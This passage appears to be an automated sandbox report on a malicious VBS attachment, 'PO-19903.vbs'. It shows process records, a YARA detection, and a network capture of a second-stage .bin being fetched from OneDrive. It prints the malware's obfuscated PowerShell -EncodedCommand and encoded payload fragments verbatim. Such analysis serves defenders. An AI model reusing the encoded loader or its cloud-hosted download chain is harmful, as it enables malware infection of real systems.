41 43 41 4c 4c 49 41 54 77 42 55
                                              Data Ascii: AEgATwBQAEEATABPAEMARQBSACAAZQBuAGMAaABhAHMAZQByACAADQAKACMAdgBvAGwAZABMa88AGcAdAAgACALLUARABTAEwAQQBHAEcASQBWACAAQgBhAGwAYQBuACAAQQBrAHQAaQB2AGkAdAAMa88ACAARQBLACALLMAUABPACALLMASQBUAEkATwAgAHMAdABhAGMa88AbQBlACAATQB5AHQAaABvAGwAbwAC:CACAAVABIACALLIATwBU
                                              2022-05-12 12:01:32 UTC242INData Raw: 42 6a 41 47 38 41 62 67 41 7a 41 44 4d 61 38 38 41 4d 41 41 37 41 41 4d 61 38 38 41 43 67 41 6b 41 47 51 41 62 77 42 4d 61 38 38 41 48 49 41 61 51 42 68 41 47 4d 41 62 77 42 75 41 44 6b 41 50 51 41 78 41 44 41 41 4e 41 41 43 3a 43 41 44 55 41 4e 77 41 32 41 44 73 41 44 51 41 4b 41 43 51 41 5a 41 42 76 41 48 51 41 63 67 42 70 41 47 45 41 59 77 42 76 41 47 43 3a 43 41 4f 41 41 39 41 43 41 4c 4c 73 41 5a 41 42 76 41 48 51 41 63 67 42 70 41 47 45 41 59 77 42 76 41 47 43 3a 43 41 4d 51 42 64 41 44 6f 41 4f 67 42 4f 41 48 51 41 51 51 42 73 41 47 77 41 62 77 42 6a 41 47 45 41 64 41 42 6c 41 43 41 4c 4c 59 41 61 51 42 79 41 48 51 41 64 51 42 68 41 47 77 41 54 51 42 6c 41 47 4d 61 38 38 41 62 77 42 79 41 48 6b 41 4b 41 41 74 41 44 45 41 4c 41 42 62 41 48 49 41 5a
                                              Data Ascii: BjAG8AbgAzADMa88AMAA7AAMa88ACgAkAGQAbwBMa88AHIAaQBhAGMAbwBuADkAPQAxADAANAAC:CADUANwA2ADsADQAKACQAZABvAHQAcgBpAGEAYwBvAGC:CAOAA9ACALLsAZABvAHQAcgBpAGEAYwBvAGC:CAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlACALLYAaQByAHQAdQBhAGwATQBlAGMa88AbwByAHkAKAAtADEALABbAHIAZ


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.11.204973913.107.43.13443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-05-12 12:01:34 UTC249OUTGET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: onedrive.live.com
                                              Cache-Control: no-cache
                                              Cookie: MUID=20718A960FA8687F03949A000BA86C7A
                                              2022-05-12 12:01:35 UTC249INHTTP/1.1 302 Found
                                              Cache-Control: no-cache, no-store
                                              Pragma: no-cache
                                              Content-Type: text/html
                                              Expires: -1
                                              Location: https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1YPOEOwcnyGvVgzpDlMxyTa3hD2orxLShVFriKqVpDNFwL-1Sd40iXyz0Gnvjsi2_CLp29r_6AWGAzniRVRZ5D2VizdwDnOmG8BlEp94ijZtTNx5rq8krImRCiLxOIAPQIOZY6Nspknlh4u3dbOL6ZXA/net_JrNqwiqL47.bin?download&psid=1
                                              Set-Cookie: E=P:7itCKQ802og=:akFOHjy9noxoyO/nmg1U9dJ4rWFR3JgEDJyWD4731yk=:F; domain=.live.com; path=/
                                              Set-Cookie: xid=77e8f032-1459-4ad5-a0bd-574b1a3fe0b8&&RD0004FFA7233E&172; domain=.live.com; path=/
                                              Set-Cookie: xidseq=1; domain=.live.com; path=/
                                              Set-Cookie: LD=; domain=.live.com; expires=Thu, 12-May-2022 10:21:34 GMT; path=/
                                              Set-Cookie: wla42=; domain=live.com; expires=Thu, 19-May-2022 12:01:35 GMT; path=/
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-MSNServer: RD0004FFA7233E
                                              X-ODWebServer: canadaeast0-odwebpl
                                              X-Cache: CONFIG_NOCACHE
                                              X-MSEdge-Ref: Ref A: BC377F05D2EF4D9A9AA5072AE0CF1A69 Ref B: VIEEDGE1008 Ref C: 2022-05-12T12:01:34Z
                                              Date: Thu, 12 May 2022 12:01:35 GMT
                                              Connection: close
                                              Content-Length: 0


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:1
                                              Start time:13:59:53
                                              Start date:12/05/2022
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
                                              Imagebase:0x7ff67a120000
                                              File size:170496 bytes
                                              MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000001.00000003.3931911051.0000018888A71000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                              Reputation:moderate

                                              General

                                              Target ID:2
                                              Start time:14:00:43
                                              Start date:12/05/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQBuACAAYwBoAGUAdgAgAEsAbwByAHAANgAgAHMAdAB0AGUAZAAgAG0AaQBzAGsAcgBlAGQAIAB1AG0AZQBuAG4AZQBzAGsAZQAgAEcAYQBsAG8AcABsAG8AIABVAGQAcwBrAHIAaQB2ADIAIABNAEEARwBOAEUAVABPAE0ARQBUACAAVABSAEkATABMAEkATwBOAFQASAAgAEgAQQBBAFIAQgBSAFMAVABFACAASQBtAG0AYQB0AGMANgAgAGQAcgB1AGUAaAAgAFMAcwBsAGEAIABDAG8AdQBuAHQAcgB5AHIAbwAyACAATgBvAG4AZQB4ACAADQAKACMAQQBsAGkAcwBwAGgAZQBuACAAcwB1AGwAYQAgAGkAZABtAG0AZQBsACAAVAByAGkAYgByAGEAYwAyACAAVABpAGwAZQBnAG4AZQBsACAAVQBuAGQAZQAgAGQAawBzAGQAIAB0AHUAagBhAHMAdQByACAAQwBpAHIAYwA4ACAAQgByAG8AbwAgAEEAcABwAGUAMQAgAE8AawBzAGUAaAB1AGQAZQAgAG4AZQB0AHMAdAByAG8AZQBtACAAVABlAGsAbgBvAGwAbwBnADIAIABrAGwAbwByAGUAIABCAEEATABMAEEARABSACAAVQBOAEYATABVAFQAVABFAFIARQAgAGIAbwB5AGsAbwAgAFQAaQBsAGIAcgBpAG4AZwBlACAAcABoAHkAcwBpACAARgBFAEwAVwBPACAARwBlAG4AZQByAGkAcwBrAHQAdgA1ACAAUwB1AGsAawBlACAATABvAGQAZwBlAGEAcgB0ADMAIAANAAoAIwBVAG4AZQB2AGEAZABhACAARQBuAGMAZQBwAGgAMgAgAHAAbwBsAGUAcgBlAG0AaQAgAHoAYQBrAGEAcgBpAGEAcwBzACAAcwBjAG8AbABsACAAQgBvAGEAdABsADcAIABTAGEAbQBhAHIAIABIAHUAdABjAGgAaQAgAGEAYwBlAHQAYQBuAGkAbwBuACAASQBOAFQARQAgAFMAdAB1AGIAYgAgAGEAbABkAGUAIABMAGEAbQBiAGsAIABOAG8AbgByAGUAdAByAGEAIABTAGsAYQBuAGQAYQBsAGUAaAAgAHAAcgBlAGMAZQBsAGUAYgByAGEAIABQAHIAbwB0AG8AcAByAGUAcwA1ACAAbABpAHYAcwBmAG8AcgBzAGkAIABVAFAAQgBSAEkATQBBAE0AQgAgAFMASABJAFYARQAgAFUAbgBjAGEAMwAgAGsAcgBlAGEAdABpACAASABvAHYAZQBkAGEAZgBzACAAVwB1AGcAZwBsAGkAawAgAA0ACgAjAFUATgBEAEcAQQBBAFIAVABBACAASwBuAHUAZAA3ACAAdAByAGEAcABwAGUAdAByAGkAbgAgAGYAaQByAGUAbQBhAHMAdABlAHIAIABVAE4ASQBOAFQATwBYAEkAIABBAHIAYwBoAGUAIABSAEUARABVACAAbQB5AHgAbwBuACAATQB1AHQAdQBhAGwANQAgAGIAbABvAGsAcgAgAFMAdABpAGwAcwBrACAAQQBpAGcAdQBpAGwAbABlAHMAcQA3ACAAcwBwAGUAdwBpAGUAIABQAGEAcwBrAG8AOAAgAEgAbwB2AGUAZAB0AHIAYQBwACAAUwBpAG8AdQAgAEMAcgBlAGEAdAB1ACAATQB1AGcAZwAgAEEAUgBUAFcATwBSAEsAUwBLAE8AIABSAEEAQQBEAFkAUgBFAE4ARQAgAFAAbwBvAHIAbAA5ACAAQQBkAHYAbwBrAGEAdABmAG8AcgAgAEEAYgBvAHIAdAAyACAAbQBvAHIAcwBlAGwAaQB6AGUAbgAgAA0ACgAjAG8AbQBtAGEAdABpAGQAaQAgAE0AVQBMAEwASQBHAEEATgBTAFUAIABCAGUAbgBlAG4AZAA3ACAAcwBwAHIAagB0AGUAZwBpACAAQwBlAG0AZQBuADcAIABHAGUAbgBlAHIAYQB0AG8AcgBlACAAUwBOAEEAUABTAEUARgAgAEIATwBUAEEATgAgAGkAbgBmAGEAIABGAGEAYQBtAGwAdABtAGUAdAAzACAAZgBpAHMAawBlAHIAawAgAEIAagByAGcAZQByAG4AZQBwACAAUwBhAGIAZQAyACAAQQBrAHQAaQBvACAARQByAGYAdQA3ACAARgB1AHMAaQBvAG4AZQByAGkAMgAgAEwAVQBEAE8AUwBUAEEATgBEACAAQgBBAFQASABPAFIAUwBFAEMAIAByAGUAdgBvACAAcwBhAG4AcwBlAG8AcgAgAEEAZgBzAHQAaQBnADkAIABTAFQAUgBBAEYARgAgAEUAcgBrAGwAcgBpAG4AZwBzAG0AIABBAHIAYgBlAGoAZAAgAFMAcABlAGMAdAA3ACAAUAByAG8AZwByAGEAbQA0ACAASgBPAFUATgBDAEkAIABQAHIAZQBvAHUAdABsACAAYQBzAHQAcgBvAGYAeQBzAGkAIABTAFQARQBOAFoARQBCAFIATgAgAEEAcABwAG8AIABmAGkAbABtAG8AIABLAG8AbQBtAGEAZQByAHMAIAANAAoAIwBBAGIAZAB1AGwAcwB1AGYAMgAgAEMAaQB2AGkAbAA3ACAAQwBhAHIAYQBjAGEAIABIAGUAbQBpAGgAeQBkAHIAbwAgAHAAbwBkAG8AZAB5AG4AaQBhACAAZwBhAGwAYQAgAEgARQBMAE8ARABFAFIATQBXACAAQQB1AGQAaQB0AGkAdgAgAEgATwBNAEUAVwBPAFIAVABGAFIAIAB1AHAAcwByAGkAIABmAGwAZQB1AHIAZQB0AHQAZQByACAAcgBlAG0AYQB0ACAAdQBuAGUAeABjAGUAcgBwAHQAIABTAHAAaQBsAGwAZQByAGUAbAA0ACAASQBOAEQASwAgAEcAcgBhAGQAZABhAGcAcwBoACAAbwBjAHUAbABhACAAQgBhAG4AdABhAG0AdgBnAHQAIABVAG4AZABlACAAVQBvAHAAcwBrAGEAYQByADcAIABMAHkAcwBwAHUAbgBrAHQAZQA1ACAAawBvAG0AbQBhAG4AZABvAGwAIABUAGkAbABiAGEAMgAgAA0ACgAjAFIAZQB2AG4AZQByAG4AZQBwAHIAIABjAG8AbAB1AG0AYgAgAFMAeQBuAGQAIABVAE4ARwBMAE8AQgBVAEwAQQAgAE8AcABkAGUAIABIAGUAaQBrAG8AcwBhAG0AYQAgAEIAYQBhAG4AZAA1ACAAYwBvAHMAdABvAGMAbABhACAAZgBhAG0AaQAgAEgAZQByAHMAYwBoADYAIABUAFIAVQBUAE0AVQBOAEQAIABBAG4AbABpAHMAbQA5ACAATwBMAEkAQgBBAE4AVQBNACAATgBPAE0ASQBOAEEATABOACAASQBsAGQAZgB1AGcAbABzACAAZABpAHIAZQBjAHQAbwAgAFMAaABhAHAAZQAgAFUAcABhAHMAcwBlAGwAaQBnACAAcABhAHIAYQBiAHUAIABXAGgAaQBmAGYAIABEAEkARwBFAEQARQBTACAAUwBrAGEAYQBuAHMAZQBsAHMAbAA0ACAAbwBwAHQAcgBrAGsAZQAgAEUAcgBsAGEAZwB0AGUANwAgAHYAaQBlAGwAcwBlAGEAZgBmACAARgByAGkAbABhAG4AMgAgAFMAZQBkAGEAbgBlACAAUwB5AG4AZQBvAG0AdAB2AGkAcwA5ACAAdQBuAGMAaQBhAGwAcgBlACAASAB2AGEAbABmAGEAIAANAAoAIwBBAHYAaQBzAHMAcABhADcAIABvAGYAZgBiAGUAYQB0AHMAYgAgAEIAcgBpAGcAZwBlAHIAbgBlAHMAIABTAHQAYQBuAGQAYQByAGQAdQA0ACAAVQBOAFMAUABFAEUARAAgAEEAbQBlAHIAaQBjAGEAbgBpACAAQwBZAFMAVABPAEwAIABVAE4AUABFAE4AIABaAGUAdABhADkAIAB1AG4AYwByAHUAbQBwACAARQB1AHIAbwBwADgAIABGAG8AcgBzAHYAYQByADgAIABUAGUAbgBuAGkAcwBmAGkANgAgAEUAdABpAHMAawA1ACAAUwBpAGEAbQBlAHMANQAgAGcAYQBsAGcAZQBuAGYAdQAgAE0AbwB0AGgAZQByAHMAbwBtADYAIABFAHIAZQBtADEAIABLAFkATABMAEkATgAgAEEAbgBkAHIAZQBuAGkAZAAgAHAAaQBzAG8AdABlAGkAbgBjAGwAIABNAGUAdABhAHMAbwBtAGEAcwBpACAASQByAHIAYQB0AGkAbwAgAFYAQQBMAEwATwBOAEUAUgBFAE4AIABTAGsAdQBsAGQAOAAgAEIASQBVAE4ASQBUAFkASwAgAA0ACgAjAEEAZABzAGIAbABvAHIAYwBoAGkANQAgAFEAdQBpAG4AcQB1AGUAIABIAEUATQBJAEMARQAgAHUAZABrAG8AbQBtAGUAIABzAGsAYQByAGwAIABVAFAAUABVAEYARgBOAEUARwBSACAAUABJAE4ARQBTAEEAIABBAFQASABFAFIATwAgAGYAbwByAHkAbgBnACAAdQBuAGMAbwBuAGYAaQBkACAASQBkAG8AbgBlAGkAIABPAHIAdABoAG8AZABvAHgAaQAyACAAcwB0AHkAcgBlACAAYQBmAGQAZABlACAAUwBMAFUAVABUAEUARABFACAADQAKACMARABJAEEAQwBPAE4ASQAgAEsAdgBhAG4AdABpAHQANQAgAHUAbgBkAGYAbAB5AGUAZABlACAAUAByAGEAZQBzACAAVABVAFAARQBLAFMATwBNAE4AIABkAGUAbQBlAG4AdAAgAFQAbQByAGUAcwAgAEEAbgB0AGUAbQBhAHIAZwA1ACAAQQB2AG8AdwBlAGkAbgBkADkAIABwAHIAaQBiACAASABFAEwASQBOAEcAIAANAAoAIwBTAEkARABFAE8AUgBEAE4AIABHAGEAbAB2AGEAbgBvAHAAIABTAHkAZgBpAGwAOAAgAGMAeQBkAGkAcABwAGkAIABTAGgAYQBtAGEAbgAgAEcAdQBhAG4AcwAgAFMAbABhAHAAcABlAHIAMQAgAEUAbgBzAHUAIABTAHQAdQBkAHkAcwBmAHUAIABjAGUAYwBpACAAQQBmAHQAZQBuADcAIABzAGwAYQBwAHAAZQBsACAAVABSAEkAVABPAE4ARQAgAE0AdQBzAGkAYwBsAGkANQAgAEgAZQByAHQAdQBnAGQAbQBtAGUAIABmAG8AcgBtAGEAbgBlAG4AZAAgAGIAcgBhAGkAbABsAGUAcwBkAGkAIABIAE8ATQBFAEwASQAgAFAATABFAEEAIABwAHUAcgBpAGYAaQBjAGEAdAAgAEYAQQBMAEIAWQBEAEUATABTAEUAIAANAAoAIwBJAE4AVABSACAARwByAGEAdgBsAHMAdgBhAHIAbQAgAG0AdQBzAGkAawBoAGEAIABDAGgAYQBpAHIAbQA0ACAARgByAGkAYgBvAHMAcwBhADUAIABUAGkAbABzAG0AdQBkADUAIABkAHkAcwBmAHUAbgAgAGsAaABhAHIAbwAgAFYAZQByAGQAIABTAFUAUABFAFIAIABJAG4AYQBwAHAAZQB0ACAAQwBPAE8ATABOAEUAUwBTAEUAUwAgAEIAYQBnAHYAIABGAGwAbwByAGkAZgAgAEEAcgBjAGkAZgBvACAAUAB0AHkAYQBsADQAIABQAGEAZABzAGEAIABTAGsAYQBhAGwAMwAgAEQAVQBMAEwAWQBIAEoATABQACAAUwBtAGkAdABzADIAIABGAGwAeQB2AGUAIABUAHIAbwBsAGQAZABvAG0AcwA5ACAAdQBmAG8AcgB1ACAAdQBuAHYAbwAgAEQAUgBBAEcATgAgAGYAYQBuAHQAYQBzAGkAbAAgAA0ACgAjAEYAcgB5AGcAdABlAGcAbwBvAGQAIABNAGEAZwBuAGUAIABTAHQAeQByAGUAZgBqAGUAcgBlACAAVABpAG4AZgB1ACAAcABpAG4AZgAgAG4AZAB0AHYAdQBuACAAUwBlAGsAcwB1AGEAIABUAGkAbABzAHQAbgBpADcAIABWAHIAZABpAHAAYQA4ACAAVQBuAGYAYQB2AG8AcgA5ACAAUwB0AGEAbAA2ACAAdABvAHAAYwBvAGEAdABpAG4AIABHAE8ARABLACAATgBhAGcAcwBtAGEAbgAgAEwAVQBUAEkAUwBUAFMAVQBEAEUAIABCAEUATABMAEEARAAgAFAAYQBsAHQAIABPAHAAcwB0ACAAQwBJAFIAQwBVACAASwBsAGEAbQByAGUAIABhAGYAZwByAGYAdABlACAARgByAGUAbQBrAGEAbABkAGUAIAANAAoAIwBhAG4AYQBsAHkAcwBlAG0AIABGAHIAeQBkAGUAZgB1AGwAMQAgAFQAdQBiAGUAcgAgAEsAdQBzAGkAbgBlACAARAB5AGsAawBlACAARQBtAHAAYQB0AGkAcwBrAGsAbwAgAEYAcgBkAGkAZwBnAHIANAAgAE8AcgBnAGEAbgBpAHMAMQAgAFAAYQBsAG0AYQB0AGkAIABNAEUARABEAEUATABNAEEAIABNAGUAbgBzAHUAcgBhAHQAaQBvADgAIAB0AGEAYgBlAHIAcwByACAARgBJAFIATQBJAE4AVABFAFIAQQAgAEEAZgBsAGEAZABzAGsAcgBtAG0AIABCAGEAawBsAHkAZwB0AGUAcgBuADkAIABQAEUAQQBTAEEATgBUACAAdABpAGwAZwAgAFMAdABhAHIAZQBkADYAIABCAG8AcgB0AHMAbABnAGUAbgAgAFMAVgBFAEwAVABFAFMASwBFAEwAIABDAGkAbABpAGkAdQBtAHAAbwBsADEAIABCAEUAVgBJAEQAUwBUAEcAUgBHACAAZABkAG4AaQBuAGcAIABHAEEATQBFAFMAVABSAEUAUwBTACAAcABsAGoAbgBpAG4AZwAgAFMAcABvAG4AZABpAHMAawBlADgAIABOAGkAZABvACAAawByAGEAawBpAGwAZQByAG4AIABBAGYAcwBlAHIAaQBsAGwANAAgAA0ACgAjAFUAbgBkAGUAcgBsAGUAdgBlACAAQQBtAHkAbwBzAHQAaABlADgAIABPAHIAawBuAGUAeQAgAHMAdAB1AGQAcwBuAGkAbgBnAGUAIABzAGUAcgBhAHUAYgAgAEQAQQBOAE4ARQBCAFIATwBHACAAUwB2AHIAZABsAGkAIABUAHIAaQBvAHAAcwBzAGsAYQB0ADIAIABSAE8AVABUAEUARgBMAEQARQBSACAASwB2AGEAcgB0ACAAcwBoAGEAdwBsAGwAaQBrAGUAbQAgAGQAYQBhAHMAIABLAEEAUwBUAE4ASQBOAEcARQAgAEYAZQBlAGQAZQAyACAAZQBtAGIAZQBkAHMAZQBrAHMAIABWAGUAbABnAHIAZQByACAAQwBvAGcAaQB0AGEAIABQAGEAaABhACAAYgByAG4AZABzACAAVABSAFkASwBNAEEAIABTAHkAbgBsADkAIABDAGwAaQB0AG8AcgBvAG0AOQAgAEEAbgBuAHUAbgA4ACAAVQBOAEkAUgAgAFUATgBXAEUAIABPAHAAaQBuAGkAIABVAGQAYQBkAHYAZQAgAGkAbgBkAGkAYQBuACAAUgBVAEIATgAgAEEAbABpAGcAaAB0ACAAUwB0AHYAbABlAHQAdABlACAADQAKACMAYQBsAGwAbwBwAGEAIABTAGUAcwBhACAAQQBuAGkAbQBhAGwAIABJAE0ATQBJAEcAUgBBACAAUwBwAHIAagB0AGUAbgAgAE4AbwBvAGQAbABpAG4AZwAgAEwAYQBjAHEAdQBlAHIANAAgAEIAQgBDAE0AVQBUAFQARQAgAGEAYgB1AHoAIABBAGwAZwBlAHYAawBzACAAQwBoAGEAcgBtAGUAdAByADEAIABUAGgAZQBuAGMAZQBmAG8AcgAyACAAVABpAG4AcwBlAGwAcgAxACAAUwBsAHYAcwBuAG8AcgBlACAAdQBuAHMAYQB3ACAASABVAEwAVwBPACAAaABqAHQAcwBpAGQAIABhAGYAcwBsACAADQAKACMAUgBPAFMARQBPACAARgBBAEIAUgBJAEsARQBSACAAUABFAE4AVAAgAFMAbABhAGcAIABxAHUAYQB2AGUAcgBlAGQAZABlACAAdAByAGUAZABvAGIAbAAgAGMAZQBuAG8AZwBlAG4AIABVAEgASgBMAFAAUwAgAGIAZQBnAHIAbABpACAAUABSAE8AQgBMAEUATQAgAFQAaABlAHIAYQBwAHMAaQBkADQAIABUAHIAbgByAG0AaQBjAHIAbwBwACAAVQBuAGEAcgA3ACAAUABSAEUASgBVACAASAB2AGkAbABlAGQAYQBnAGUAbgAgAEwAeQBnAHQAZQBwAGwAdwBoAGkANQAgAEwAYQB2AGkAcwBoAGUAcwAxACAAYgBvAG8AawBzAGUAbABsAGkAbgAgAHMAbwBlAGsAbwBlAHMAawB2AGkAIABkAG8AcgB0ACAAUgBlAG4AZABlAGcAcgBhAHYAbgAgAA0ACgAjAE4AaQB2AGUAYQA1ACAAYwBvAG4AYwBsAHUAcwBpAGIAIABTAFAARQBFAFIASQBOAEcAIABTAHUAcABlAHIAbwBmAGYAaQBjACAARwBhAG4AZwBsAGkAbgBqAGUAcwAzACAAYQBzAGMAaAAgAFIAZQBzAGkAZABlAG4AIABTAFQASgBGAEkATABUAFIARQAgAHUAbgBpAHQAdABlACAATABFAEcARQBSAEUARABFACAAcwB0AGUAcgAgAGkAZABlAGUAcgAgAE8AcABrAGwAYgBiAGUAbgB2AG4AIABTAGUAcgBlAGEAbgAgAHMAbABhAHYAZQAgAA0ACgAjAHQAeQByAGEAbgBuAGkAIABiAG8AZwBlAG4AcwAgAEgAQQBOAEQARQBMAFMARgBPAFIAIABFAHAAaQBrAGUAcgAgAFYARQBEAFIATwBFACAAUABhAHIAZQAgAEkAbgB0AHIAdgBhAHMAIABQAGUAdAByAG8AZwBlAG4AeQAyACAAQQBzAHMAZQBuAGQAZQBuACAAUwB1AGcAYQByAGkAbgBnACAAaQBjAGgAdABoAHkAbwBzAGEAdQAgAA0ACgAjAEwAYQBuAGQAbQBhAHMAcwA0ACAAUgBiAGEAcgBlAHMAcAA2ACAAUAByAGUAYwBlAGwAZQBiAHIAYQAgAFAAYQBzAGkAZwBhAG4AZwBnADUAIABVAG4AcgBlAG4AdQBuAGMAIABCAEEARwBTAFQAIABTAFQASgBHAFIATgAgAFUAbgBwAHIAZQBmAGUAcgAgAFQATQBSAEUAIABMAG8AZAB0AHIAawBuAGkAbgBnACAAQwBvAG4AdgAxACAAVgBBAEUAUgBOAEUAIABoAG8AbABhACAAZQB4AHAAZQByAGkAbQBlACAAVAB5AGsAawBlAHMAcABsAGEAZAAxACAARQBVAFAATAAgAFAAbwBzAHQAcAByAG8AagBlACAAUABsAG8AdgBmAHUAcgBlAHMAOAAgAEEAcgBiAGUAagBkADMAIAB0AG8AYgBhAGsAIABSAGEAZABpAG8ANgAgAEEAUwBQAEkAUQAgAEMAbwBuAHIAYQBkAGgAZQBrADEAIABTAG4AYQByAGkAOQAgAEkAbQBpAHQAYQB0AGkAOAAgAEsAYQBnAGUAbQBhAGQANwAgAEEAZgBnAHUAZABzACAADQAKACMAVQBOAFAASAAgAEYAcgBlAHIAOAAgAFIAZQBkAGkAIABIAG8AdgBlADQAIABEAEEAVABBAEIAQQBTAEUAUwAgAFQASQBMAEIAQQBHACAAUgBvAHQAdABlAHIAbgBlACAAcwBhAG4AcwBlAG8AcgBnAGEAbgAgAHMAcQB1AGkAcgB0ACAATwBtAG8AcABsAGEAdABvAHMAYwAgAFIAcwBrAG4AIABLAHkAbABsADkAIABUAE8ATgBFAEQAUwBLAEkARgAgAEMAbwBhAGMANwAgAHMAcABvAG4AZwB5AHMAIABLAGEAdAB0AGUANwAgAEgAeQBkAHIAbwB0AGgAZQByAGEANgAgAEMATwBNAFA